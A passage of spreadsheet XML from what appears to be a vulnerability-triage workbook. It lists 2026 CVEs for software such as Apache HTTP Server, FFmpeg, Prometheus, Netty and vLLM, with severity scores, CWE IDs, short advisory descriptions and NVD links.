      <c r="E2571" s="5" t="inlineStr"/>
      <c r="F2571" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2571" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2571" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I2571" s="5" t="inlineStr">
        <is>
          <t>2026-06-08</t>
        </is>
      </c>
      <c r="J2571" s="5" t="inlineStr"/>
      <c r="K2571" s="5" t="inlineStr">
        <is>
          <t>CWE-120, CWE-122</t>
        </is>
      </c>
      <c r="L2571" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow in mod_proxy_html in Apache HTTP Server 2.4.67 and earlier allows an attack by an untrusted backend.
Users are recommended to upgrade to version 2.4.68, which fixes this issue.</t>
        </is>
      </c>
      <c r="M2571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34355</t>
        </is>
      </c>
    </row>
    <row r="2572">
      <c r="A2572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34986</t>
        </is>
      </c>
      <c r="C2572" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2572" s="5" t="inlineStr"/>
      <c r="F2572" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2572" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2572" s="5" t="inlineStr">
        <is>
          <t>go-jose_project:go-jose</t>
        </is>
      </c>
      <c r="I2572" s="5" t="inlineStr">
        <is>
          <t>2026-04-06</t>
        </is>
      </c>
      <c r="J2572" s="5" t="inlineStr"/>
      <c r="K2572" s="5" t="inlineStr">
        <is>
          <t>CWE-131, CWE-248</t>
        </is>
      </c>
      <c r="L2572" s="5" t="inlineStr">
        <is>
          <t>Go JOSE provides an implementation of the Javascript Object Signing and Encryption set of standards in Go, including support for JSON Web Encryption (JWE), JSON Web Signature (JWS), and JSON Web Token (JWT) standards. Prior to 4.1.4 and 3.0.5, decrypting a JSON Web Encryption (JWE) object will panic if the alg field indicates a key wrapping algorithm (one ending in KW, with the exception of A128GCMKW, A192GCMKW, and A256GCMKW) and the encrypted_key field is empty. The panic happens when cipher.KeyUnwrap() in key_wrap.go attempts to allocate a slice with a zero or negative length based on the length of the encrypted_key. This code path is reachable from ParseEncrypted() / ParseEncryptedJSON() / ParseEncryptedCompact() followed by Decrypt() on the resulting object. Note that the parse functions take a list of accepted key algorithms. If the accepted key algorithms do not include any key wrapping algorithms, parsing will fail and the application will be unaffected. This panic is also reachable by calling cipher.KeyUnwrap() directly with any ciphertext parameter less than 16 bytes long, but calling this function directly is less common. Panics can lead to denial of service. This vulnerability is fixed in 4.1.4 and 3.0.5.</t>
        </is>
      </c>
      <c r="M2572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34986</t>
        </is>
      </c>
    </row>
    <row r="2573">
      <c r="A2573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35172</t>
        </is>
      </c>
      <c r="C2573" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2573" s="5" t="inlineStr"/>
      <c r="F2573" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2573" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2573" s="5" t="inlineStr">
        <is>
          <t>distribution:distribution</t>
        </is>
      </c>
      <c r="I2573" s="5" t="inlineStr">
        <is>
          <t>2026-04-06</t>
        </is>
      </c>
      <c r="J2573" s="5" t="inlineStr"/>
      <c r="K2573" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-524</t>
        </is>
      </c>
      <c r="L2573" s="5" t="inlineStr">
        <is>
          <t>Distribution is a toolkit to pack, ship, store, and deliver container content. Prior to 3.1.0, distribution can restore read access in repo a after an explicit delete when storage.cache.blobdescriptor: redis and storage.delete.enabled: true are both enabled. The delete path clears the shared digest descriptor but leaves stale repo-scoped membership behind, so a later Stat or Get from repo b repopulates the shared descriptor and makes the deleted blob readable from repo a again. This vulnerability is fixed in 3.1.0.</t>
        </is>
      </c>
      <c r="M2573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35172</t>
        </is>
      </c>
    </row>
    <row r="2574">
      <c r="A2574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37198</t>
        </is>
      </c>
      <c r="C2574" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2574" s="5" t="inlineStr"/>
      <c r="F2574" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2574" s="5" t="inlineStr"/>
      <c r="H2574" s="5" t="inlineStr"/>
      <c r="I2574" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2574" s="5" t="inlineStr"/>
      <c r="K2574" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2574" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the SMF component of Open5GS v2.7.6 allows attackers to cause a Denial of Service (DoS) via supplying a crafted GTP packet.</t>
        </is>
      </c>
      <c r="M2574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37198</t>
        </is>
      </c>
    </row>
    <row r="2575">
      <c r="A2575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37237</t>
        </is>
      </c>
      <c r="C2575" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2575" s="5" t="inlineStr"/>
      <c r="F2575" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2575" s="5" t="inlineStr"/>
      <c r="H2575" s="5" t="inlineStr"/>
      <c r="I2575" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2575" s="5" t="inlineStr"/>
      <c r="K2575" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2575" s="5" t="inlineStr">
        <is>
          <t>vLLM up to and including 0.17.0 allows remote attackers to cause a Denial of Service via memory exhaustion. The AsyncMediaIO.fetch_audio and AsyncMediaIO.fetch_image functions in multimodal/inputs.py fetch user-supplied media URLs using aiohttp and call r.read() without enforcing a maximum response size, allowing an attacker to exhaust server memory by providing a URL to an arbitrarily large file.</t>
        </is>
      </c>
      <c r="M2575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37237</t>
        </is>
      </c>
    </row>
    <row r="2576">
      <c r="A2576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37736</t>
        </is>
      </c>
      <c r="C2576" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2576" s="5" t="inlineStr"/>
      <c r="F2576" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2576" s="5" t="inlineStr"/>
      <c r="H2576" s="5" t="inlineStr"/>
      <c r="I2576" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2576" s="5" t="inlineStr"/>
      <c r="K2576" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2576" s="5" t="inlineStr">
        <is>
          <t>An issue in the JsonSanitizer.sanitize() component of OWASP json-sanitizer v1.2.3 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37736</t>
        </is>
      </c>
    </row>
    <row r="2577">
      <c r="A2577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38344</t>
        </is>
      </c>
      <c r="C2577" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2577" s="5" t="inlineStr"/>
      <c r="F2577" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2577" s="5" t="inlineStr"/>
      <c r="H2577" s="5" t="inlineStr"/>
      <c r="I2577" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2577" s="5" t="inlineStr"/>
      <c r="K2577" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2577" s="5" t="inlineStr">
        <is>
          <t>A NULL pointer dereference in the get_min_buffer_size function (/libswscale/slice.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted video file.</t>
        </is>
      </c>
      <c r="M2577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38344</t>
        </is>
      </c>
    </row>
    <row r="2578">
      <c r="A2578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38346</t>
        </is>
      </c>
      <c r="C2578" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2578" s="5" t="inlineStr"/>
      <c r="F2578" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2578" s="5" t="inlineStr"/>
      <c r="H2578" s="5" t="inlineStr"/>
      <c r="I2578" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2578" s="5" t="inlineStr"/>
      <c r="K2578" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2578" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the yuv2planeX_8_c() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted video file.</t>
        </is>
      </c>
      <c r="M2578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38346</t>
        </is>
      </c>
    </row>
    <row r="2579">
      <c r="A2579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38347</t>
        </is>
      </c>
      <c r="C2579" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2579" s="5" t="inlineStr"/>
      <c r="F2579" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2579" s="5" t="inlineStr"/>
      <c r="H2579" s="5" t="inlineStr"/>
      <c r="I2579" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2579" s="5" t="inlineStr"/>
      <c r="K2579" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2579" s="5" t="inlineStr">
        <is>
          <t>A heap overflow in the ff_sws_alphablendaway function (libswscale/alphablend.c) of FFmpeg git-master commit 722a217 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38347</t>
        </is>
      </c>
    </row>
    <row r="2580">
      <c r="A2580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38348</t>
        </is>
      </c>
      <c r="C2580" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2580" s="5" t="inlineStr"/>
      <c r="F2580" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2580" s="5" t="inlineStr"/>
      <c r="H2580" s="5" t="inlineStr"/>
      <c r="I2580" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2580" s="5" t="inlineStr"/>
      <c r="K2580" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2580" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the libswscale/utils.c component of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted image file.</t>
        </is>
      </c>
      <c r="M2580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38348</t>
        </is>
      </c>
    </row>
    <row r="2581">
      <c r="A2581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38349</t>
        </is>
      </c>
      <c r="C2581" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2581" s="5" t="inlineStr"/>
      <c r="F2581" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2581" s="5" t="inlineStr"/>
      <c r="H2581" s="5" t="inlineStr"/>
      <c r="I2581" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2581" s="5" t="inlineStr"/>
      <c r="K2581" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2581" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the hScale16To19_c() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted image file.</t>
        </is>
      </c>
      <c r="M2581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38349</t>
        </is>
      </c>
    </row>
    <row r="2582">
      <c r="A2582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38350</t>
        </is>
      </c>
      <c r="C2582" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2582" s="5" t="inlineStr"/>
      <c r="F2582" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2582" s="5" t="inlineStr"/>
      <c r="H2582" s="5" t="inlineStr"/>
      <c r="I2582" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2582" s="5" t="inlineStr"/>
      <c r="K2582" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2582" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the target_sws_fuzzer() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted input.</t>
        </is>
      </c>
      <c r="M2582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38350</t>
        </is>
      </c>
    </row>
    <row r="2583">
      <c r="A2583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38636</t>
        </is>
      </c>
      <c r="C2583" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2583" s="5" t="inlineStr"/>
      <c r="F2583" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2583" s="5" t="inlineStr"/>
      <c r="H2583" s="5" t="inlineStr"/>
      <c r="I2583" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2583" s="5" t="inlineStr"/>
      <c r="K2583" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2583" s="5" t="inlineStr">
        <is>
          <t>An issue in the seekdir() function (/dirent/mod.rs) of relibc commit 61f42d allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38636</t>
        </is>
      </c>
    </row>
    <row r="2584">
      <c r="A2584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38638</t>
        </is>
      </c>
      <c r="C2584" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2584" s="5" t="inlineStr"/>
      <c r="F2584" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2584" s="5" t="inlineStr"/>
      <c r="H2584" s="5" t="inlineStr"/>
      <c r="I2584" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2584" s="5" t="inlineStr"/>
      <c r="K2584" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2584" s="5" t="inlineStr">
        <is>
          <t>An issue in the with_argv function (/unistd/mod.rs) of relibc commit 61f42d allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38638</t>
        </is>
      </c>
    </row>
    <row r="2585">
      <c r="A2585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39820</t>
        </is>
      </c>
      <c r="C2585" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2585" s="5" t="inlineStr"/>
      <c r="F2585" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2585" s="5" t="inlineStr"/>
      <c r="H2585" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2585" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J2585" s="5" t="inlineStr"/>
      <c r="K2585" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-770</t>
        </is>
      </c>
      <c r="L2585" s="5" t="inlineStr">
        <is>
          <t>Well-crafted inputs reaching ParseAddress, ParseAddressList, and ParseDate were able to trigger excessive CPU exhaustion and memory allocations.</t>
        </is>
      </c>
      <c r="M2585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39820</t>
        </is>
      </c>
    </row>
    <row r="2586">
      <c r="A2586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39829</t>
        </is>
      </c>
      <c r="C2586" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2586" s="5" t="inlineStr"/>
      <c r="F2586" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2586" s="5" t="inlineStr"/>
      <c r="H2586" s="5" t="inlineStr">
        <is>
          <t>golang:crypto</t>
        </is>
      </c>
      <c r="I2586" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J2586" s="5" t="inlineStr"/>
      <c r="K2586" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-347</t>
        </is>
      </c>
      <c r="L2586" s="5" t="inlineStr">
        <is>
          <t>The RSA and DSA public key parsers did not enforce size limits on key parameters. A crafted public key with an excessively large modulus or DSA parameter could cause several minutes of CPU consumption during signature verification. This could be triggered by unauthenticated clients during public key authentication. RSA moduli are now limited to 8192 bits, and DSA parameters are validated per FIPS 186-2.</t>
        </is>
      </c>
      <c r="M2586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39829</t>
        </is>
      </c>
    </row>
    <row r="2587">
      <c r="A2587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41602</t>
        </is>
      </c>
      <c r="C2587" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2587" s="5" t="inlineStr"/>
      <c r="F2587" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2587" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2587" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I2587" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J2587" s="5" t="inlineStr"/>
      <c r="K2587" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2587" s="5" t="inlineStr">
        <is>
          <t>Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41602</t>
        </is>
      </c>
    </row>
    <row r="2588">
      <c r="A2588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42151</t>
        </is>
      </c>
      <c r="C2588" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2588" s="5" t="inlineStr"/>
      <c r="F2588" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2588" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H2588" s="5" t="inlineStr">
        <is>
          <t>prometheus:prometheus</t>
        </is>
      </c>
      <c r="I2588" s="5" t="inlineStr">
        <is>
          <t>2026-05-04</t>
        </is>
      </c>
      <c r="J2588" s="5" t="inlineStr"/>
      <c r="K2588" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-256, CWE-312</t>
        </is>
      </c>
      <c r="L2588" s="5" t="inlineStr">
        <is>
          <t>Prometheus is an open-source monitoring system and time series database. Prior to versions 3.5.3 and 3.11.3, the client_secret field in the Azure AD remote write OAuth configuration (storage/remote/azuread) was typed as string instead of Secret. Prometheus redacts fields of type Secret when serving the configuration via the /-/config HTTP API endpoint. Because the field was a plain string, the Azure OAuth client secret was exposed in plaintext to any user or process with access to that endpoint. This issue has been patched in versions 3.5.3 and 3.11.3.</t>
        </is>
      </c>
      <c r="M2588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42151</t>
        </is>
      </c>
    </row>
    <row r="2589">
      <c r="A2589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42154</t>
        </is>
      </c>
      <c r="C2589" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2589" s="5" t="inlineStr"/>
      <c r="F2589" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2589" s="5" t="inlineStr"/>
      <c r="H2589" s="5" t="inlineStr">
        <is>
          <t>prometheus:prometheus</t>
        </is>
      </c>
      <c r="I2589" s="5" t="inlineStr">
        <is>
          <t>2026-05-04</t>
        </is>
      </c>
      <c r="J2589" s="5" t="inlineStr"/>
      <c r="K2589" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="L2589" s="5" t="inlineStr">
        <is>
          <t>Prometheus is an open-source monitoring system and time series database. Prior to versions 3.5.3 and 3.11.3, the remote read endpoint (/api/v1/read) does not validate the declared decoded length in a snappy-compressed request body before allocating memory. An unauthenticated attacker can send a small payload that causes a huge heap allocation per request. Under concurrent load this can exhaust available memory and crash the Prometheus process. This issue has been patched in versions 3.5.3 and 3.11.3.</t>
        </is>
      </c>
      <c r="M2589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42154</t>
        </is>
      </c>
    </row>
    <row r="2590">
      <c r="A2590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42499</t>
        </is>
      </c>
      <c r="C2590" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2590" s="5" t="inlineStr"/>
      <c r="F2590" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2590" s="5" t="inlineStr"/>
      <c r="H2590" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2590" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J2590" s="5" t="inlineStr"/>
      <c r="K2590" s="5" t="inlineStr">
        <is>
          <t>CWE-1046</t>
        </is>
      </c>
      <c r="L2590" s="5" t="inlineStr">
        <is>
          <t>Pathological inputs could cause DoS through consumePhrase when parsing an email address according to RFC 5322.</t>
        </is>
      </c>
      <c r="M2590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42499</t>
        </is>
      </c>
    </row>
    <row r="2591">
      <c r="A2591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42536</t>
        </is>
      </c>
      <c r="C2591" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2591" s="5" t="inlineStr"/>
      <c r="F2591" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2591" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2591" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I2591" s="5" t="inlineStr">
        <is>
          <t>2026-06-08</t>
        </is>
      </c>
      <c r="J2591" s="5" t="inlineStr"/>
      <c r="K2591" s="5" t="inlineStr">
        <is>
          <t>CWE-120, CWE-122</t>
        </is>
      </c>
      <c r="L2591" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M2591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42536</t>
        </is>
      </c>
    </row>
    <row r="2592">
      <c r="A2592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42587</t>
        </is>
      </c>
      <c r="C2592" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2592" s="5" t="inlineStr"/>
      <c r="F2592" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2592" s="5" t="inlineStr"/>
      <c r="H2592" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2592" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J2592" s="5" t="inlineStr"/>
      <c r="K2592" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2592" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.</t>
        </is>
      </c>
      <c r="M2592" s="6" t="inlineStr">
        <is>
